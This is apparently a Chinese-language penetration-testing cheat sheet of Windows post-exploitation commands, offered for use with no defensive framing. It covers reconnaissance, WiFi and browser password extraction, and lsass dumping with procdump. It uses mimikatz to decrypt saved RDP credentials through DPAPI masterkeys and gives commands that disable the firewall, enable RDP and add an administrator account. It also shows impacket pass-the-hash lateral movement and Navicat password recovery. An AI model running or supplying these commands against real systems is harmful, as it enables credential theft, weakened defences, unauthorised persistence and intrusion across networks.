主机信息搜集
常用信息搜集
whoami # 查看当前用户
net user # 查看所有用户
query user | quser | qwinsta# 查看当前在线用户
ipconfig /all # 查看当前主机的主机名/IP/DNS等信息
route print # 查看路由表信息
netstat -ano # 查看端口开放情况
arp -a # 查看arp解析情况
tasklist /svc # 查看进程及对应服务名
net localgroup administrators # 查看管理员组成员
systeminfo # 查看系统信息含补丁信息
net use # 查看ipc连接情况
net share #查看默认共享
net view # 查看匿名共享情况
netsh firewall show state # 查看防火墙状态
cmdkey /l # 查看当前保存的登陆凭证
type c:/windows/system32/drivers/etc/hosts #查看机器域名绑定IP情况
杀软识别
tasklist /svc查看进程所有进程放到识别辅助网站:https://i.hacking8.com/tiquan
常见杀软进程:hips,deamon,360sd,zhudongfangyu,hipsmain.exe,tray
密码搜集
netsh wlan show profiles # 查看连接过的wifi名称
netsh wlan show profile name="wifi名称" key=clear # 查看wifi的密码
dir /a %userprofile%\AppData\Local\Microsoft\Credentials* # 查看RDP连接凭证
dir /a /s /b "c:\inetpub\www\*config*" > 1.txt # 数据库配置文件
laZagne.exe all -oN # 本地wifi/浏览器等密码
dir %APPDATA%\Microsoft\Windows\Recent # 查看最近打开的文档
测试连通性
ping www.baidu.com# ICMP连通性nslookup www.baidu.com# DNS连通性curl https://www.baidu.com# http连通性nc ip port# TCP连通性
环境信息搜集
- nbtscan.exe xx.xx.xx.xx/24 # 查看c段机器
- arp -a
- nmap
- fscan
- goby
- ping脚本扫描
密码搜集
- mimikatz
- procdump
- lazagne
- chromepass
- browserghost
- 收集机器上的密码文件
- 网站配置文件
查询网络配置信息
ipconfig /all
查询本机的服务信息
wmic service list brief
sc query
查询系统信息
systeminfo
查看连接过的WIFI及密码
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
查询进程列表
tasklist /svc
tasklist /v #查看的内容更详细
wmic process list brief
查看计划任务
schtasks /query /fo LIST /v #列出计划任务详细信息
查看主机开机时间
net statistics workstation
用户相关
net user #查看所有用户
net localgroup administrators #获取本地管理员信息
查看端口列表
netstat -ano
查看已打补丁
wmic qfe get Caption,Description,HotFixID,InstalledOn
查看共享列表
net share #查看本机共享列表和可访问的域共享列表
wmic share get name,path,status #查找共享列表
路由表和arp高速缓存表
route print 查看路由表
arp -a arp 查看高速缓存表
防火墙
netsh firewall set opmode disable 关闭防火墙(Windows Server 2003 以前的版本)
netsh advfirewall set allprofiles state off 关闭防火墙(Windows Server 2003 以后的版本)
netsh firewall show config 查看防火墙配置 如果上面的命令被弃用,则使用 netsh advfirewall firewall show rule name=all
根据参考,可以使用这个wmic一键获取本机信息:http://www.fuzzysecurity.com/scripts/files/wmic_info.rar
权限查看
whoami /all 查看自己的详细权限
本机wmic查杀软
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
or
WMIC /namespace:\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe
开3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
用户增删改查
net user username password /add #加用户
net localgroup administrators username /add #添加XX到管理员账户
查看开机自启
Reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Reg query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
抓浏览器密码工具:https://github.com/QAX-A-Team/BrowserGhost
解密RDP保存的密码
当我们通过rdp服务登录远程桌面时,如果我们选择了保存凭证
会在本地生成一个凭证文件,我们只要破解这个凭证里面的数据即可获得明文密码
首先查看注册表查找有没有历史RDP记录
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s
这里可以看到登录某主机对应的ip、凭证名和用户名
去目录下查找凭证,Windows保存RDP凭据的目录是
C:\Users\用户名\AppData\Local\Microsoft\Credentials
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
这里如果是桌面去查找,要开启显示隐藏文件,直接使用离线方式,将上面凭证文件下载下来,在本地使用mimikzte加载该凭证,里面有guidMasterKey和pbData两个值是重点
mimikatz # dpapi::cred /in:C:\users\admin\desktop\123\FA8654DBDA31F5DA3DA2EE53F0372F46
guidMasterKey是凭据的GUID,pbData是凭据的加密数据
而我们解密所需要的秘钥的值则保存在lsass进程中
procdump64.exe -accepteula -ma lsass.exe c:\lsass.dmp
或者可以利用离线方式使用mimikatz加载dmp文件
mimikatz.exe "sekurlsa::mimidump lsass.dmp" "log" "sekurlsa::logonpasswords"
利用凭证获得的guidMasterKey值查找对应的masterkey值
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::dpapi" "exit"
masterkey则就是我们所需要加密凭据的密钥
最后通过mimikzte使用masterkey破解该凭证即可获得明文密码
mimikatz.exe
mimikatz# dpapi::cred /in:C:\users\admin\desktop\123\FA8654DBDA31F5DA3DA2EE53F0372F46 /masterkey:6983ce8378095b4bc86a1fbf353e14a61edd5615012b9192a59d11077d425bea83df3515022395fecb8bffa98ea82fc8db2011d06fa5ba61f74c8fd869c4f23a
利用mimikatz获取masterkey
mimikatz "dpapi::cred /in:C:\Credentials\FFED4D851854C3D32CB82752056D34CF" "exit"
#guidMasterKey: {345abb52-c72c-4e82-bc5e-ce44c4df9d9e}
mimikatz "sekurlsa::minidump C:\Credentials\lsass.dmp" "sekurlsa::dpapi" "exit"
#GUID:{345abb52-c72c-4e82-bc5e-ce44c4df9d9e}
#MasterKey:45bef00c98f498a54e7b73b3022fcf085807e106ee36e8dbf2fd5e5562220a46883fa2492fd391504815e990c828895308b3f6db9ce118cff8b87edaf0609be4
mimikatz "dpapi::cred /in:C:\Credentials\FFED4D851854C3D32CB82752056D34CF /masterkey:45bef00c98f498a54e7b73b3022fcf085807e106ee36e8dbf2fd5e5562220a46883fa2492fd391504815e990c828895308b3f6db9ce118cff8b87edaf0609be4" "exit"
关闭防火墙:
netsh advfirewall set allprofiles state off
netsh firewall set opmode mode=disable
impacket-atexec administrator:ICQsafe666@172.16.12.2 whoami #execute command,写计划任务执行命令
impacket-atexec administrator@172.16.12.2 whoami -hashes :99d85d9d737629f593b11771123df22c
impacket-psexec administrator:ICQsafe666@172.16.12.2 #get shell 利用默认共享ipc$上传文件,getshell
impacket-psexec administrator@172.16.12.2 -hashes :99d85d9d737629f593b11771123df22c
impacket-smbexec administrator:ICQsafe666@172.16.12.2 #利用smb登录getshell
impacket-smbexec administrator@172.16.12.2 -hashes :99d85d9d737629f593b11771123df22c
impacket-dcomexec administrator@172.16.12.2 -hashes :99d85d9d737629f593b11771123df22c #利用dcom组件
impacket-wmiexec administrator@172.16.12.2 -hashes :99d85d9d737629f593b11771123df22c #利用wmi getshell
解密Navica密码
一、查看navicat保存的密码
1.进入注册表
regedit 2.找到 navicat 中存储的密码
Navicat针对不同的数据库,它所存放的地点是不一样的
MySQL HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\
MariaDB HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADB\Servers\
MicrosoftSQL HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQL\Servers\
Oracle HKEY_CURRENT_USER\Software\PremiumSoft\NavicatOra\Servers\
PostgreSQL HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPG\Servers\
SQLite HKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite\Servers\
3.mysql存储的密码
HKEY_CURRENT_USER\Softwar\PremiumSoft\Navicat\Servers
二、解密密码
https://github.com/tianhe1986/FatSmallTools